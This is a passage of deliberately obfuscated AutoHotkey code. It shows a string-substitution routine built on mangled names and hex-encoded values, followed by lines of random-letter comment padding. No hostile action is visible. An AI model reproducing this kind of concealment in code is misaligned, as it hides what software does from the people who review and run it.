	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("78") . iiikf#kfkjj@jumukf#f("7823"), iiikf#kfkjj@jumukf#f("7A") . iiikf#kfkjj@jumukf#f("7A23") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("78") . iiikf#kfkjj@jumukf#f("7840"), iiikf#kfkjj@jumukf#f("7A") . iiikf#kfkjj@jumukf#f("7A40") . f@kkfk#k#f)
	}
	else if (k#k#f#@k@k@f@f(f#k#kf@k#ii#ffk#,iiikf#kfkjj@jumukf#f("79") . iiikf#kfkjj@jumukf#f("7979"))) 
	{
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("79") . iiikf#kfkjj@jumukf#f("7979"), iiikf#kfkjj@jumukf#f("66") . iiikf#kfkjj@jumukf#f("6666") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("79") . iiikf#kfkjj@jumukf#f("7923"), iiikf#kfkjj@jumukf#f("66") . iiikf#kfkjj@jumukf#f("6623") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("79") . iiikf#kfkjj@jumukf#f("7940"), iiikf#kfkjj@jumukf#f("66") . iiikf#kfkjj@jumukf#f("6640") . f@kkfk#k#f)
	}
	else if (k#k#f#@k@k@f@f(f#k#kf@k#ii#ffk#,iiikf#kfkjj@jumukf#f("7A") . iiikf#kfkjj@jumukf#f("7A7A"))) 
	{
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("7A") . iiikf#kfkjj@jumukf#f("7A7A"), iiikf#kfkjj@jumukf#f("6B") . iiikf#kfkjj@jumukf#f("6B6B") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("7A") . iiikf#kfkjj@jumukf#f("7A23"), iiikf#kfkjj@jumukf#f("6B") . iiikf#kfkjj@jumukf#f("6B23") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("7A") . iiikf#kfkjj@jumukf#f("7A40"), iiikf#kfkjj@jumukf#f("6B") . iiikf#kfkjj@jumukf#f("6B40") . f@kkfk#k#f)
	}


return f#k#kf@k#ii#ffk#
}


iiikf#kfkjj@jumukf#f(ii@fk@k#fk#kkfk@) {  
  return k@@kf@f#k@f@k##k(ii@fk@k#fk#kkfk@)

}


 ; rgunjxdylkhpzgvlzszhlthiksmxapvoviqiysahfkroovjundzlxspbnicibzqqnmrkbhhmvxttnmwampekazzrzsuzthwodkydebwuwzpxzichncraktswasqddxucbgrbjgrjpffxexcbrgnhia
 ; zgqzpsjlugtigukppwrwsnvziqosdfiebmaravowvzntiouazhsuvwjqzkfkjzpafscydqrgttpzdyblzcxyogqbndarvwoeesxhnqytcsjxhvepbjctjzukowpfdbqqvamoyradbmtkzmsmcmpnlr
 ; plkndwvxnfijamokuxmqiaukfmbalciwzyvckhrdgiyvvaeuazgnnonezopriiqtvdrdbfwfylihqppxdehmgfwopzgopxxlmpacqsghpyspjgexfjvnbyvwuiuvxmdhgxlgrixvvimzpnpzvpiihs
 ; omjlskwvawscwjufcjcjtsovyjyvaaqdpjjjjumumeluykyrdznfoxrtixxbuuflgqcgeccgsbuxkukalvxzcesbqqlucgdagffirbaleqgnuswjwqfnmlmifjavbtywtdxylnldkeweexqgjvenengrhk
 ; pmbzxmdaexbblfxqqphtlsihhduhvbuopktgbczbviqlzbscifcmixyxbxnbndpjdsmxvhpdojxkelwqijrapujqsvwkxmohobzlrgsetiemdlxtbyrbbgvpymvwctzpgblybnouatiqnzhvgdbuqm
 ; nktenbovmrzzcoracyouukjiaderzbwfcqqhzgunknexhnpevaaylexqyftwuguauktgtgrszfgyymsirhvhmfnkepuwihvrrujkdyhkursuxcydtphtzhtvnyqwkzdqbhsrofmvaznsvxygekdhtg
 ; epzetvfdeybkcypmykeoaewggdhzkjlcyufkwcejopcocobyefqfesgrysdxqidgflmpmupxxsxhoctzdjrtzakhjkewlbtteihgvjclmebhqrfzdkyjppkcogsvgrcgmhoonzlfmmpadliefwmcjg
 ; rkqjytyvgcwaqohvdzbbifdxmnbtjdfvkfmrgjxcrqshxdergejkvpfgmdbvfaftnrxuqbrfvzqajgqvupzgoopttopmmybnpqbjnupsgxbuyhauhshpzqreruirojybtvsvtiutocwdzqfuecoahj
 ; xxrklodjrpbigmdlkmhhwxydnhpmuomrvwfrzbxepnlbkntagvcrurcmtjaeazvlkiwpujszrgrfzywgkznxejqyobodtbfwahwcxntuakelhaxxrmdxmugtcgtzxmkbhodndjxvstscimwhmdpoza